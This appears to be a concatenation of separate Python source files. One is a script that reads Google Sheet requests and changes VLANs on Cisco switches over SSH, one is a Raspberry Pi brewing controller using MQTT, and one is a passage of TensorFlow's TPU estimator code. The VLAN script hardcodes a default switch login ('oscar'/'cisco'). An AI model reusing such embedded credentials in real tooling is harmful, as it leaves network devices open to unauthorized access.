'Air Con': 7,
'DATA': 8,
'Administrator': 9,
'vBrick': 10,
'Servers': 11,
'Wireless': 12,
}
def main():
"""
Reads through submitted responses making changes on new entries.
:return: None
"""
while True:
service_sheets = get_google_service('sheets', 'v4', 'token_sheets.json', SCOPES_SHEETS)
result = service_sheets.spreadsheets().values().get(spreadsheetId=SPREADSHEET_ID,
range=RANGE_NAME).execute()
values = result.get('values', [])
new_data_found = False
if values:
current_row = 2
global q
q = queue.Queue()
threads = []
for data in values:
try:
status = data[6]
if status == 'Authentication Failure' \
or status == 'Connection Timeout':
new_data_found = True
q.put((data, current_row))
except IndexError:
new_data_found = True
q.put((data, current_row))
current_row += 1
if new_data_found:
num_workers = q.qsize() if q.qsize() < MAX_THREADS else MAX_THREADS
print ('num workers: ', num_workers)
for i in range(num_workers):
thread_name = 'thread {}'.format(i)
t = threading.Thread(target=worker, name=thread_name, daemon=True)
t.start()
threads.append(t)
print('workers created')
print('queue size: ', q.qsize())
q.join()
for i in range(num_workers):
q.put(None)
for t in threads:
t.join()
print('workers killed')
print('queue size: ', q.qsize())
if not new_data_found:
print('sleeping')
time.sleep(seconds)
def worker():
"""
Creates a worker/thread. Changes vlans until no jobs are left in the queue.
:return: None
"""
service_gmail = get_google_service('gmail', 'v1', 'token_gmail.json', SCOPES_GMAIL)
service_sheets = get_google_service('sheets', 'v4', 'token_sheets.json', SCOPES_SHEETS)
while True:
data = q.get()
if data is None:
print('Worker freed')
break
print('Worker assigned new job')
device_type = get_system_type(ip=data[0][3])
current_row = data[1]
change_vlan(data[0], device_type, current_row, service_sheets, service_gmail)
q.task_done()
print('worker finished job')
def get_google_service(type, version, token, scope):
"""
Builds and returns a google service.
:param type: String - Type of service to build, either 'gmail' or 'sheets'
:param version: String - Service version e.g. 'v1' 'v4'
:param token: String - Name of token file to create
:param scope: String - Scope of the service i.e. permissions
:return: googleapiclient.discovery.Resource
"""
store = file.Storage(token)
creds = store.get()
if not creds or creds.invalid:
flow = client.flow_from_clientsecrets('credentials.json', scope)
creds = tools.run_flow(flow, store)
return build(type, version, http=creds.authorize(Http()))
def create_message(form_data, status, to=', '.join(EMAILS), subject='VLAN change fail'):
"""
Creates and returns a message.
:param form_data: List - Submitted responses
:param status: String - Status to include in the message body
:param to: String - List of recipients
:param subject: String - Subject of the email
:return: Dict - Message
"""
message_text = str(form_data) + '\n\nStatus: ' + status
message = MIMEText(message_text)
message['to'] = to if len(EMAILS) > 1 else EMAILS[0]
message['from'] = ''
message['subject'] = subject
raw = base64.urlsafe_b64encode(message.as_bytes())
raw = raw.decode()
message = {'raw': raw}
return message
def send_email(service_gmail, message, user_id='me'):
"""
Sends an email
:param service_gmail: Authorized Gmail API service instance.
:param message: Message to be sent
:param user_id: User's email address. The special value "me"
can be used to indicate the authenticated user.
:return: None
"""
try:
message = (service_gmail.users().messages().send(userId=user_id, body=message)
.execute())
return message
except errors.HttpError as error:
print('An error occurred: %s' % error)
def update_sheet(range_to_edit, status, service_sheets, desired_vlan, current_vlan="\' \'"):
"""
Updates the status, change timestamp and vlan change details on the sheet
:param range_to_edit: String - Range of cells to be updated e.g. 'G2:I2'
:param status: String - New status e.g. 'Successful'
:param service_sheets: googleapiclient.discovery.Resource
:param desired_vlan: String - Desired VLAN according to submitted response
:param current_vlan: String - Current VLAN 'name, id'
:return: None
"""
change_info = current_vlan + ' >> ' + desired_vlan + ', ' + str(VLAN_DICT.get(desired_vlan))
new_status = {
'range': range_to_edit,
'majorDimension': 'ROWS',
'values': [[status, get_time(), change_info]]
}
request = service_sheets.spreadsheets().values().update(
spreadsheetId=SPREADSHEET_ID, range=range_to_edit,
valueInputOption='USER_ENTERED', body=new_status)
request.execute()
def get_time():
"""
Returns a String representation of the current time
:return: String - Month/Day/Year HH:MM:SS
"""
tz = timezone('America/Chicago')
current_date, current_time = str(datetime.now(tz)).split('.', 1)[0].split(' ')
year, month, day = current_date.split('-')
month = month.lstrip('0')
day = day.lstrip('0')
formatted_date = '%s/%s/%s %s' % (month, day, year, current_time)
return formatted_date
def get_system_type(ip):
"""
FOR FUTURE USE.
If more than one OS is in use, ideally this function would read
from a file that lists IPs and OS types. In this case only cisco_ios
is in use.
:param ip: String - IP address of the device
:return: String - OS of the device
"""
return 'cisco_ios'
def change_vlan(form_data, device_type, current_row, service_sheets, service_gmail):
"""
:param form_data: List of data of the current row in the sheet
:param device_type: OS of the device e.g. cisco_ios
:param current_row: row in the google sheet
:param service_sheets: googleapiclient.discovery.Resource
:param service_gmail: googleapiclient.discovery.Resource
:return: None
"""
range_to_edit = 'G' + str(current_row) + ':I' + str(current_row)
desired_vlan = form_data[1]
status = 'Connecting...'
update_sheet(range_to_edit, status, service_sheets, desired_vlan)
if device_type == 'cisco_ios':
cisco_ios_change(form_data, range_to_edit, service_sheets, service_gmail)
elif device_type == 'some HP':
print()
# TODO: some HP function, Extreme etc
def cisco_ios_change(form_data, range_to_edit, service_sheets, service_gmail):
"""
Attempts an SSH connection to the switch.
Exits if connection fails to be established.
Changes VLAN as needed, only saving if change is validated successfully.
:param form_data: List of data of the current row in the sheet
:param range_to_edit: String - Range of cells to be updated e.g. "G2:I2"
:param service_sheets: googleapiclient.discovery.Resource
:param service_gmail: googleapiclient.discovery.Resource
:return: None
"""
ip_address = form_data[3]
port = str(form_data[4]).replace(' ', '')
desired_vlan = form_data[1]
if port.upper()[0] == 'G':
port = port[:2] + port[15:]
else:
port = port[:2] + port[12:]
# adjust user/pass accordingly
cisco_ios_switch = {
'device_type': 'cisco_ios',
'ip': ip_address,
'username': 'oscar',
'password': 'cisco',
'port': 22, # optional, defaults to 22
'secret': '', # optional, defaults to ''
'verbose': False # optional, default to False
}
net_connect, status = get_connection(cisco_ios_switch)
update_sheet(range_to_edit, status, service_sheets, desired_vlan)
# Stops if a connection fails to be established
if status != 'Connection Established':
return send_email(service_gmail, message=create_message(form_data, status))
output = net_connect.send_command('show vlan br')
current_vlan = get_current_cisco_vlan(output, port)
current_vlan = current_vlan[0] + ', ' + current_vlan[1]
status = 'Attempting change...'
update_sheet(range_to_edit, status, service_sheets, desired_vlan, current_vlan)
# Stops if port is not access or port is not found (Should probably never happen)
if current_vlan == 'None, -1':
if is_trunk(net_connect.send_command('show int trunk'), port):
status = 'Port is trunk'
else:
status = 'Port not found'
update_sheet(range_to_edit, status, service_sheets, desired_vlan, current_vlan)
return send_email(service_gmail, message=create_message(form_data, status))
interface_cmd = 'interface ' + port
vlan_cmd = 'switchport access vlan ' + str(VLAN_DICT.get(desired_vlan))
net_connect.send_config_set([interface_cmd, vlan_cmd])
output = net_connect.send_command('show vlan br')
if validate_cisco(output, port, desired_vlan):
net_connect.save_config()
status = 'Successful'
send_email(service_gmail, message=create_message(form_data, status, to=form_data[5], subject='VLAN Changed'))
else:
status = 'Failed'
send_email(service_gmail, message=create_message(form_data, status))
net_connect.cleanup()
net_connect.disconnect()
update_sheet(range_to_edit, status, service_sheets, desired_vlan, current_vlan)
def get_connection(device):
"""
Returns a Connection to the device and a status message
:param device: Dict - holds device information
:return: Connection, String - Netmiko Connection if possible, Status
"""
net_connect = ''
try:
net_connect = ConnectHandler(**device)
status = 'Connection Established'
except ssh_exception.NetMikoAuthenticationException:
status = 'Authentication Failure'
except ssh_exception.NetMikoTimeoutException:
status = 'Connection Timeout'
return net_connect, status
def get_current_cisco_vlan(output, port):
"""
Returns the current VLAN assignment for a given interface.
Reads the output of "show vlan brief" line by line storing the last read
vlan ID and name. When the interface is found, the current stored
ID and name are returned. If no match is found, ('None', '0') is returned.
:param output: String - Output of "show vlan brief"
:param port: String - Interface to be modified (e.g. Gi0/1 Fa0/1)
:return: String Tuple - (vlan NAME, vlan ID) e.g. (DATA, 8)
"""
for lines in output.strip().splitlines():
if match(r'\d{1,4}', lines[0:3].strip()):
vlan_id = lines[0:3].strip()
vlan_name = lines[5:37].strip()
if port in lines:
if vlan_name.upper() != 'VOICE':
return vlan_name, vlan_id
return 'None', '-1'
def validate_cisco(output, port, vlan):
"""
Returns True if current VLAN matches desired VLAN, False otherwise
:param output: String - Output of "show vlan brief"
:param port: String - Interface to be modified (e.g. Gi0/1 Fa0/1)
:param vlan: String - Desired VLAN according to submitted response
:return: Bool
"""
desired_vlan = str(VLAN_DICT.get(vlan))
if get_current_cisco_vlan(output, port)[1] == desired_vlan:
return True
return False
def is_trunk(output, port):
"""
Returns True port is trunk, False otherwise
:param output: String - Output of 'show int trunk'
:param port: String - The port e.g. Gi0/1
:return: Bool
"""
for lines in output.strip().splitlines():
if port in lines:
return True
return False
if __name__ == '__main__':
main()
|
bcontrol.py
|
#!/usr/bin/python
# MIT License
# Copyright (c) 2018 Martin Klingensmith
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import struct, array, time, io, fcntl
import RPi.GPIO as GPIO
import time
import sys
import paho.mqtt.subscribe as subscribe
import paho.mqtt.publish as publish
import threading
class bcontrol(object):
def __init__(self):
self.enable = 4
self.ch1 = 17
self.ch2 = 27
self.BIN = "{0:8b}"
self.htexch = 0.
self.mash_tun = 0.
self.hlt = 0.
self.pwm1 = 0.
self.pwm2 = 0.
self.rotenc_input = 0.
self.sub_topics = ["adc/1", "adc/2", "rotenc", "pwm1", "pwm2"]
self.th1 = threading.Thread(target=self.thread_sub, args=())
self.th1.daemon = True
self.th1.start()
def cb(self, client, userdata, message):
if message.topic == "adc/1":
self.mash_tun = float(message.payload.decode("utf-8"))
elif message.topic == "adc/2":
self.hlt = float(message.payload.decode("utf-8"))
elif message.topic == "rotenc":
inp = float(message.payload.decode("utf-8"))
print ("rotenc %2.0f" % inp)
self.rotenc_input = self.rotenc_input + inp
elif message.topic == "pwm1":
self.pwm1 = float(message.payload.decode("utf-8"))
elif message.topic == "pwm2":
self.pwm2 = float(message.payload.decode("utf-8"))
else:
print("%s %s" % (message.topic, message.payload.decode("utf-8")))
def thread_sub(self):
subscribe.callback(self.cb, self.sub_topics, qos=0, userdata=self, hostname="localhost")
def pid_set(self, setpoint):
publish.single("pid/set", "%2.2f" % setpoint, hostname="localhost")
def pwm2_set(self, setpoint):
setpoint = setpoint / 100.
if setpoint > 1.00:
setpoint = 1.00
if setpoint < 0.00:
setpoint = 0.0
publish.single("pwm2", "%2.2f" % setpoint, hostname="localhost")
def pid_set_sensor_source(self, sensortopic):
publish.single("sensortopic", sensortopic, hostname="localhost")
def enable_heater_hlt(self):
print("enable_heater_hlt")
def enable_heater_boil(self):
print("enable_heater_boil")
def disable_heaters(self):
print("disable_heaters")
# Convert PT100 resistance to temperature (Celsius)
# this equation works pretty well between 0C and 105C
# The error is less than 0.1 degree for most of that range.
def pt100_to_temperature(self,resistance):
try:
c=(resistance-100.1)/.3847
except:
c=None
return c
def adc_to_voltage(self,lsb):
try:
volts=lsb*4.096/65536.
except:
volts=None
return volts
def celsius_to_f(self,c):
try:
f=c*9./5.+32.
except:
f=None
return f
def ohms_to_f(self,ohms):
return self.celsius_to_f(self.pt100_to_temperature(ohms))
def adc_to_f(self,lsb):
try:
f=self.celsius_to_f(self.pt100_to_temperature(self.adc_to_voltage(lsb)*1000.))
except:
f=None
return f
def init_temp_sensors(self):
pass
def read_temp_sensor(self):
adc1_ch0 = 1.0
adc1_ch1 = 1.1
rtd_0 = (adc1_ch0 - 2.0 * adc1_ch1)*1000.0
#self.mash_tun = 0 #self.ohms_to_f(rtd_0) + self.cal_mash_tun_sensor
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import signal
import threading
import time
import traceback
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.summary import summary_ops as contrib_summary
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator import util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops():
# Gets the variables back from TPU nodes. This means the variables updated
# by TPU will now be *synced* to host memory.
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU
system before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(
collections.namedtuple('TPUEstimatorSpec', [
'mode',
'predictions',
'loss',
'train_op',
'eval_metrics',
'export_outputs',
'scaffold_fn',
'host_call'
])):
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, 'predictions, 'loss', 'train_op', and
'export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
@{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with @{tf.contrib.summary.create_file_writer}.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=hooks,
evaluation_hooks=hooks,
prediction_hooks=hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.' % self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=True):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._session_cancel_timer = None
self._feed_error = None
self._finished = False
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
self._init_ops = [tpu.initialize_system(job=self._master_job)]
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _log_error(self, session, error):
"""Log an infeed or outfeed error.
This logs a short error message immediately, and schedules a timer to
emit the full stack trace and error message after a short period of time.
If the main session has terminated by the time the timer triggers, we
assume the real source of the error was from the main session and avoid
emitting a stack trace for the infeed.
Args:
session: `tf.Session`, session to be terminated error: exception that
triggered logging.
error: the Exception to log.
"""
logging.warning(
'\n\n'
'Error occurred during infeed/outfeed. This may be due to a compile '
'error in the main session. Waiting for a short time for the main '
'session to come back.\n\n%s', error)
self._feed_error = traceback.format_exc()
# If we've already encountered a feed error, don't schedule another
# cancellation op.
if self._session_cancel_timer:
return
def _cancel_session():
# Close the session to avoid the main thread from hanging. If input
# pipeline triggers any error, the infeed thread dies but the main thread
# for TPU computation waits for the infeed enqueue forever. Close the
# Session to cancel the main thread Session.run execution.
#
# We sleep for a few seconds before closing to give some time
# for the TPU compilation error, if any, propagating, from TPU to CPU
# host. Compilation errors should be reported by the main thread so that
# the program can be interrupted and users can take action. Due to a race
# condition, the infeed thread might see an error first. Closing the
# session here immediately would result in a session cancellation
# exception in the main thread, instead of the expected compile error.
# User code that depends on having the proper exception type will
# therefore be confused.
time.sleep(5)
# If the main session is still running, the infeed/outfeed errors are
# legitimate, and should be logged.
if not self._finished and self._feed_error:
logging.error('Feed error: %s', self._feed_error)
logging.error('Closing session. A RuntimeError should follow.')
session.close()
self._session_cancel_timer = threading.Thread(target=_cancel_session)
self._session_cancel_timer.daemon = True
self._session_cancel_timer.start()
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('%s thread sleeping for %d seconds.', self._name,
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('%s thread starting after sleep', self._name)
try:
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
try:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
logging.info('Outfeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def after_create_session(self, session, coord):
logging.info('Init TPU system')
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
logging.info('Start infeed thread controller')
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
logging.info('Start outfeed thread controller')
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
def before_run(self, run_context):
self._feed_error = None
# Wait for the cancellation timer to complete before continuing.
if self._session_cancel_timer:
self._session_cancel_timer.join()
self._session_cancel_timer = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
if self._session_cancel_timer:
logging.warning('Feed error occurred; waiting for message.')
self._session_cancel_timer.join()
self._finished = True
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
logging.info('Stop output thread controller')
self._outfeed_controller.join()
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=False)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
